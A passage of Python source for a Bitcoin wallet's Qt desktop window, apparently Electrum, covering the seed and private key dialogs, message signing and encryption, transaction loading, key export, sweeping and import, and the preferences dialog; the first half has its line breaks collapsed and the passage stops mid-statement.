grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) vbox.addLayout(grid) if self.wallet.is_deterministic(): mpk_text = ShowQRTextEdit() mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) def show_mpk(index): mpk_text.setText(mpk_list[index]) # only show the combobox in case multiple accounts are available if 
len(mpk_list) > 1: def label(key): if isinstance(self.wallet, Multisig_Wallet): return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )' return '' labels = [label(i) for i in range(len(mpk_list))] on_click = lambda clayout: show_mpk(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click) vbox.addLayout(labels_clayout.layout()) else: vbox.addWidget(QLabel(_("Master Public Key"))) show_mpk(0) vbox.addWidget(mpk_text) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(dialog))) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) r = self.gui_object.daemon.delete_wallet(wallet_path) self.close() if r: self.show_error(_("Wallet removed: {}").format(basename)) else: self.show_error(_("Wallet file not found: {}").format(basename)) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(str(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase) d.exec_() def show_qrcode(self, data, title = _("QR code"), parent=None): if not data: return d = QRDialog(data, parent or self, title) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk, redeem_script = self.wallet.export_private_key(address, password) except Exception as e: self.logger.exception('') self.show_message(str(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) if redeem_script: vbox.addWidget(QLabel(_("Redeem Script") + ':')) rds_e = ShowQRTextEdit(text=redeem_script) rds_e.addCopyButton(self.app) vbox.addWidget(rds_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = _("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") + '\n\n' + \ _('The operation is undefined. 
Not just in Electrum, but in general.') @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return if not self.wallet.is_mine(address): self.show_message(_('Address not in wallet.')) return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']: self.show_message(_('Cannot sign messages with this type of address:') + \ ' ' + txin_type + '\n\n' + self.msg_sign) return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): try: signature.setText(base64.b64encode(sig).decode('ascii')) except RuntimeError: # (signature) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = ecc.verify_message_with_address(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = 
QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, txt): from electrum.transaction import tx_from_str try: tx = tx_from_str(txt) return Transaction(tx) except BaseException as e: self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e)) return def read_tx_from_qrcode(self): from electrum import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except BaseException as e: self.show_error(str(e)) return if not data: return # if the user scanned a bitcoin URI if str(data).startswith("bitcoin:"): self.pay_to_URI(data) return # else if the user scanned an offline signed tx try: data = bh2u(bitcoin.base_decode(data, length=None, base=43)) except BaseException as e: self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e))) return tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self): fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn") if not fileName: return try: with open(fileName, "r") as f: file_content = f.read() except (ValueError, IOError, os.error) as reason: self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction")) if not text: return tx = self.tx_from_text(text) if tx: self.show_transaction(tx) def do_process_from_file(self): tx = self.read_tx_from_file() if tx: self.show_transaction(tx) def do_process_from_txid(self): from electrum import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() try: raw_tx = self.network.run_from_another_thread( self.network.get_transaction(txid, timeout=10)) except Exception as e: self.show_message(_("Error getting transaction from network") + ":\n" + str(e)) return tx = transaction.Transaction(raw_tx) self.show_transaction(tx) @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It cannot be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(980, 300) vbox = 
QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password)[0] private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(str(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def import_labels(path): def _validate(data): return data # TODO def import_labels_assign(data): for key, value in data.items(): self.wallet.set_label(key, value) import_meta(path, _validate, import_labels_assign) def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), import_labels, on_import) def do_export_labels(self): def export_labels(filename): export_meta(self.wallet.labels, filename) export_meta_gui(self, _('labels'), export_labels) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) 
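        # Added behaviour sketch (not in the original source): the Sweep button
        # created below stays disabled until on_edit() sees both a syntactically
        # valid destination address and at least one parseable private key
        # (e.g. a WIF string pasted into keys_e).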
        vbox.addStretch(1)
        button = OkButton(d, _('Sweep'))
        vbox.addLayout(Buttons(CancelButton(d), button))
        button.setEnabled(False)

        def get_address():
            addr = str(address_e.text()).strip()
            if bitcoin.is_address(addr):
                return addr

        def get_pk(*, raise_on_error=False):
            text = str(keys_e.toPlainText())
            return keystore.get_private_keys(text, raise_on_error=raise_on_error)

        def on_edit():
            valid_privkeys = False
            try:
                valid_privkeys = get_pk(raise_on_error=True) is not None
            except Exception as e:
                button.setToolTip(f'{_("Error")}: {str(e)}')
            else:
                button.setToolTip('')
            button.setEnabled(get_address() is not None and valid_privkeys)

        on_address = lambda text: address_e.setStyleSheet(
            (ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
        keys_e.textChanged.connect(on_edit)
        address_e.textChanged.connect(on_edit)
        address_e.textChanged.connect(on_address)
        on_address(str(address_e.text()))
        if not d.exec_():
            return
        # user pressed "sweep"
        addr = get_address()
        try:
            self.wallet.check_address(addr)
        except InternalAddressCorruption as e:
            self.show_error(str(e))
            raise
        try:
            coins, keypairs = sweep_preparations(get_pk(), self.network)
        except Exception as e:  # FIXME too broad...
            self.show_message(str(e))
            return
        self.do_clear()
        self.tx_external_keypairs = keypairs
        self.spend_coins(coins)
        self.payto_e.setText(addr)
        self.spend_max()
        self.payto_e.setFrozen(True)
        self.amount_e.setFrozen(True)
        self.warn_if_watching_only()

    def _do_import(self, title, header_layout, func):
        text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
        if not text:
            return
        keys = str(text).split()
        good_inputs, bad_inputs = func(keys)
        if good_inputs:
            msg = '\n'.join(good_inputs[:10])
            if len(good_inputs) > 10:
                msg += '\n...'
            self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg)
        if bad_inputs:
            msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
            if len(bad_inputs) > 10:
                msg += '\n...'
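            # Bad inputs get their own popup; both listings are truncated to the first 10 entries.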
self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): self.need_restart = False d = WindowModalDialog(self, _('Preferences')) vbox = QVBoxLayout() tabs = QTabWidget() gui_widgets = [] fee_widgets = [] tx_widgets = [] id_widgets = [] # language lang_help = _('Select which language is used in the GUI (after restart).') lang_label = HelpLabel(_('Language') + ':', lang_help) lang_combo = QComboBox() from electrum.i18n import languages lang_combo.addItems(list(languages.values())) lang_keys = list(languages.keys()) lang_cur_setting = self.config.get("language", '') try: index = lang_keys.index(lang_cur_setting) except ValueError: # not in list index = 0 lang_combo.setCurrentIndex(index) if not self.config.is_modifiable('language'): for w in [lang_combo, lang_label]: w.setEnabled(False) def on_lang(x): lang_request = list(languages.keys())[lang_combo.currentIndex()] if lang_request != self.config.get('language'): self.config.set_key("language", lang_request, True) self.need_restart = True lang_combo.currentIndexChanged.connect(on_lang) gui_widgets.append((lang_label, lang_combo)) nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." 
will be displayed as "1.00"') nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help) nz = QSpinBox() nz.setMinimum(0) nz.setMaximum(self.decimal_point) nz.setValue(self.num_zeros) if not self.config.is_modifiable('num_zeros'): for w in [nz, nz_label]: w.setEnabled(False) def on_nz(): value = nz.value() if self.num_zeros != value: self.num_zeros = value self.config.set_key('num_zeros', value, True) self.history_list.update() self.address_list.update() nz.valueChanged.connect(on_nz) gui_widgets.append((nz_label, nz)) msg = '\n'.join([ _('Time based: fee rate is based on average confirmation time estimates'), _('Mempool based: fee rate is targeting a depth in the memory pool') ] ) fee_type_label = HelpLabel(_('Fee estimation') + ':', msg) fee_type_combo = QComboBox() fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')]) fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0) def on_fee_type(x): self.config.set_key('mempool_fees', x==2) self.config.set_key('dynamic_fees', x>0) self.fee_slider.update() fee_type_combo.currentIndexChanged.connect(on_fee_type) fee_widgets.append((fee_type_label, fee_type_combo)) feebox_cb = QCheckBox(_('Edit fees manually')) feebox_cb.setChecked(self.config.get('show_fee', False)) feebox_cb.setToolTip(_("Show fee edit box in send tab.")) def on_feebox(x): self.config.set_key('show_fee', x == Qt.Checked) self.fee_adv_controls.setVisible(bool(x)) feebox_cb.stateChanged.connect(on_feebox) fee_widgets.append((feebox_cb, None)) use_rbf = self.config.get('use_rbf', True) use_rbf_cb = QCheckBox(_('Use Replace-By-Fee')) use_rbf_cb.setChecked(use_rbf) use_rbf_cb.setToolTip( _('If you check this box, your transactions will be marked as non-final,') + '\n' + \ _('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \ _('Note that some merchants do not accept non-final transactions until they are confirmed.')) def on_use_rbf(x): self.config.set_key('use_rbf', bool(x)) batch_rbf_cb.setEnabled(bool(x)) use_rbf_cb.stateChanged.connect(on_use_rbf) fee_widgets.append((use_rbf_cb, None)) batch_rbf_cb = QCheckBox(_('Batch RBF transactions')) batch_rbf_cb.setChecked(self.config.get('batch_rbf', False)) batch_rbf_cb.setEnabled(use_rbf) batch_rbf_cb.setToolTip( _('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \ _('This will save fees.')) def on_batch_rbf(x): self.config.set_key('batch_rbf', bool(x)) batch_rbf_cb.stateChanged.connect(on_batch_rbf) fee_widgets.append((batch_rbf_cb, None)) msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\ + _('The following alias providers are available:') + '\n'\ + '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\ + 'For more information, see https://openalias.org' alias_label = HelpLabel(_('OpenAlias') + ':', msg) alias = self.config.get('alias','') alias_e = QLineEdit(alias) def set_alias_color(): if not self.config.get('alias'): alias_e.setStyleSheet("") return if self.alias_info: alias_addr, alias_name, validated = self.alias_info alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True)) else: alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) def on_alias_edit(): alias_e.setStyleSheet("") alias = str(alias_e.text()) self.config.set_key('alias', alias, True) if alias: self.fetch_alias() set_alias_color() 
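        # Re-apply the colouring whenever a background OpenAlias lookup completes.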
        self.alias_received_signal.connect(set_alias_color)
        alias_e.editingFinished.connect(on_alias_edit)
        id_widgets.append((alias_label, alias_e))

        # SSL certificate
        msg = ' '.join([
            _('SSL certificate used to sign payment requests.'),
            _('Use setconfig to set ssl_chain and ssl_privkey.'),
        ])
        if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
            try:
                SSL_identity = paymentrequest.check_ssl_config(self.config)
                SSL_error = None
            except BaseException as e:
                SSL_identity = "error"
                SSL_error = str(e)
        else:
            SSL_identity = ""
            SSL_error = None
        SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
        SSL_id_e = QLineEdit(SSL_identity)
        SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
        if SSL_error:
            SSL_id_e.setToolTip(SSL_error)
        SSL_id_e.setReadOnly(True)
        id_widgets.append((SSL_id_label, SSL_id_e))

        units = base_units_list
        msg = (_('Base unit of your wallet.')
               + '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
               + _('This setting affects the Send tab, and all balance related fields.'))
        unit_label = HelpLabel(_('Base unit') + ':', msg)
        unit_combo = QComboBox()
        unit_combo.addItems(units)
        unit_combo.setCurrentIndex(units.index(self.base_unit()))

        def on_unit(x, nz):
            unit_result = units[unit_combo.currentIndex()]
            if self.base_unit() == unit_result:
                return
            edits = self.amount_e, self.fee_e, self.receive_amount_e
            amounts = [edit.get_amount() for edit in edits]
            self.decimal_point = base_unit_name_to_decimal_point(unit_result)
            self.config.set_key('decimal_point', self.decimal_point, True)
            nz.setMaximum(self.decimal_point)
            self.history_list.update()
            self.request_list.update()
            self.address_list.update()
            for edit, amount in zip(edits, amounts):
                edit.setAmount(amount)
            self.update_status()
        unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
        gui_widgets.append((unit_label, unit_combo))

        block_explorers = sorted(util.block_explorer_info().keys())
        msg = _('Choose which online block explorer to use for functions that open a web browser')
        block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
        block_ex_combo = QComboBox()
        block_ex_combo.addItems(block_explorers)
        block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))

        def on_be(x):
            be_result = block_explorers[block_ex_combo.currentIndex()]
            self.config.set_key('block_explorer', be_result, True)
        block_ex_combo.currentIndexChanged.connect(on_be)
        gui_widgets.append((block_ex_label, block_ex_combo))

        from electrum import qrscanner
        system_cameras = qrscanner._find_system_cameras()
        qr_combo = QComboBox()
        qr_combo.addItem("Default", "default")
        for camera, device in system_cameras.items():
            qr_combo.addItem(camera, device)
        # combo.addItem("Manually specify a device", config.get("video_device"))
        index = qr_combo.findData(self.config.get("video_device"))
        qr_combo.setCurrentIndex(index)
        msg = _("Install the zbar package to enable this.")
        qr_label = HelpLabel(_('Video Device') + ':', msg)
        qr_combo.setEnabled(qrscanner.libzbar is not None)
        on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
        qr_combo.currentIndexChanged.connect(on_video_device)
        gui_widgets.append((qr_label, qr_combo))

        colortheme_combo = QComboBox()
        colortheme_combo.addItem(_('Light'), 'default')
        colortheme_combo.addItem(_('Dark'), 'dark')
        index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
        colortheme_combo.setCurrentIndex(index)
        colortheme_label = QLabel(_('Color theme') + ':')

        def on_colortheme(x):
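            # Re-styling existing widgets only fully applies after a restart.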
            self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
            self.need_restart = True
        colortheme_combo.currentIndexChanged.connect(on_colortheme)
        gui_widgets.append((colortheme_label, colortheme_combo))

        updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
        updatecheck_cb.setChecked(self.config.get('check_updates', False))

        def on_set_updatecheck(v):
            self.config.set_key('check_updates', v == Qt.Checked, save=True)
        updatecheck_cb.stateChanged.connect(on_set_updatecheck)
        gui_widgets.append((updatecheck_cb, None))

        filelogging_cb = QCheckBox(_("Write logs to file"))
        filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))

        def on_set_filelogging(v):
            self.config.set_key('log_to_file', v == Qt.Checked, save=True)
            self.need_restart = True
        filelogging_cb.stateChanged.connect(on_set_filelogging)
        filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
        gui_widgets.append((filelogging_cb, None))

        usechange_cb = QCheckBox(_('Use change addresses'))
        usechange_cb.setChecked(self.wallet.use_change)
        if not self.config.is_modifiable('use_change'):
            usechange_cb.setEnabled(False)

        def on_usechange(x):
            usechange_result = x == Qt.Checked
            if self.wallet.use_change != usechange_result:
                self.wallet.use_change = usechange_result
                self.wallet.storage.put('use_change', self.wallet.use_change)
                multiple_cb.setEnabled(self.wallet.use_change)
        usechange_cb.stateChanged.connect(on_usechange)
        usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
        tx_widgets.append((usechange_cb, None))

        def on_multiple(x):
            multiple = x == Qt.Checked
            if self.wallet.multiple_change != multiple:
                self.wallet.multiple_change = multiple
                self.wallet.storage.put('multiple_change', multiple)
        multiple_change = self.wallet.multiple_change
        multiple_cb = QCheckBox(_('Use multiple change addresses'))
        multiple_cb.setEnabled(self.wallet.use_change)
        multiple_cb.setToolTip('\n'.join([
            _('In some cases, use up to 3 change addresses in order to break '
              'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transactions fees.')
        ]))
        multiple_cb.setChecked(multiple_change)
        multiple_cb.stateChanged.connect(on_multiple)
        tx_widgets.append((multiple_cb, None))

        def fmt_docs(key, klass):
            lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
            return '\n'.join([key, "", " ".join(lines)])

        choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
        if len(choosers) > 1:
            chooser_name = coinchooser.get_name(self.config)
            msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
            msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
            chooser_label = HelpLabel(_('Coin selection') + ':', msg)
            chooser_combo = QComboBox()
            chooser_combo.addItems(choosers)
            i = choosers.index(chooser_name) if chooser_name in choosers else 0
            chooser_combo.setCurrentIndex(i)

            def on_chooser(x):
                chooser_name = choosers[chooser_combo.currentIndex()]
                self.config.set_key('coin_chooser', chooser_name)
            chooser_combo.currentIndexChanged.connect(on_chooser)
            tx_widgets.append((chooser_label, chooser_combo))

        def on_unconf(x):
            self.config.set_key('confirmed_only', bool(x))
        conf_only = self.config.get('confirmed_only', False)
        unconf_cb = QCheckBox(_('Spend only confirmed coins'))
        unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
        unconf_cb.setChecked(conf_only)
        unconf_cb.stateChanged.connect(on_unconf)
        tx_widgets.append((unconf_cb, None))

        def on_outrounding(x):
            self.config.set_key('coin_chooser_output_rounding', bool(x))
        enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
        outrounding_cb = QCheckBox(_('Enable output value rounding'))
        outrounding_cb.setToolTip(
            _('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
            _('This might improve your privacy somewhat.') + '\n' +
            _('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
        outrounding_cb.setChecked(enable_outrounding)
        outrounding_cb.stateChanged.connect(on_outrounding)
        tx_widgets.append((outrounding_cb, None))

        # Fiat Currency
        hist_checkbox = QCheckBox()
        hist_capgains_checkbox = QCheckBox()
        fiat_address_checkbox = QCheckBox()
        ccy_combo = QComboBox()
        ex_combo = QComboBox()

        def update_currencies():
            if not self.fx:
                return
            currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
            ccy_combo.clear()
            ccy_combo.addItems([_('None')] + currencies)
            if self.fx.is_enabled():
                ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))

        def update_history_cb():
            if not self.fx:
                return
            hist_checkbox.setChecked(self.fx.get_history_config())
            hist_checkbox.setEnabled(self.fx.is_enabled())

        def update_fiat_address_cb():
            if not self.fx:
                return
            fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())

        def update_history_capgains_cb():
            if not self.fx:
                return
            hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
            hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())

        def update_exchanges():
            if not self.fx:
                return
            b = self.fx.is_enabled()
            ex_combo.setEnabled(b)
            if b:
                h = self.fx.get_history_config()
                c = self.fx.get_currency()
                exchanges = self.fx.get_exchanges_by_ccy(c, h)
            else:
                exchanges = self.fx.get_exchanges_by_ccy('USD', False)
            ex_combo.blockSignals(True)
            ex_combo.clear()
            ex_combo.addItems(sorted(exchanges))
            ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
            ex_combo.blockSignals(False)

        def on_currency(hh):
            if not self.fx:
                return
            b = bool(ccy_combo.currentIndex())
            ccy = str(ccy_combo.currentText()) if b else None
            self.fx.set_enabled(b)
            if b and ccy != self.fx.ccy:
                self.fx.set_currency(ccy)
            update_history_cb()
            update_exchanges()
            self.update_fiat()

        def on_exchange(idx):
            exchange = str(ex_combo.currentText())
            if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
                self.fx.set_exchange(exchange)

        def on_history(checked):
            if not self.fx:
                return
            self.fx.set_history_config(checked)
            update_exchanges()
            self.history_model.refresh('on_history')
            if self.fx.is_enabled() and checked:
                self.fx.trigger_update()
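            # Capital-gains display depends on the history-rates checkbox, so refresh it too.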
update_history_capgains_cb() def on_history_capgains(checked): if not self.fx: return self.fx.set_history_capital_gains_config(checked) self.history_model.refresh('on_history_capgains') def on_fiat_address(checked): if not self.fx: return self.fx.set_fiat_address_config(checked) self.address_list.refresh_headers() self.address_list.update() update_currencies() update_history_cb() update_history_capgains_cb() update_fiat_address_cb() update_exchanges() ccy_combo.currentIndexChanged.connect(on_currency) hist_checkbox.stateChanged.connect(on_history) hist_capgains_checkbox.stateChanged.connect(on_history_capgains) fiat_address_checkbox.stateChanged.connect(on_fiat_address) ex_combo.currentIndexChanged.connect(on_exchange) fiat_widgets = [] fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo)) fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox)) fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox)) fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox)) fiat_widgets.append((QLabel(_('Source')), ex_combo)) tabs_info = [ (fee_widgets, _('Fees')), (tx_widgets, _('Transactions')), (gui_widgets, _('General')), (fiat_widgets, 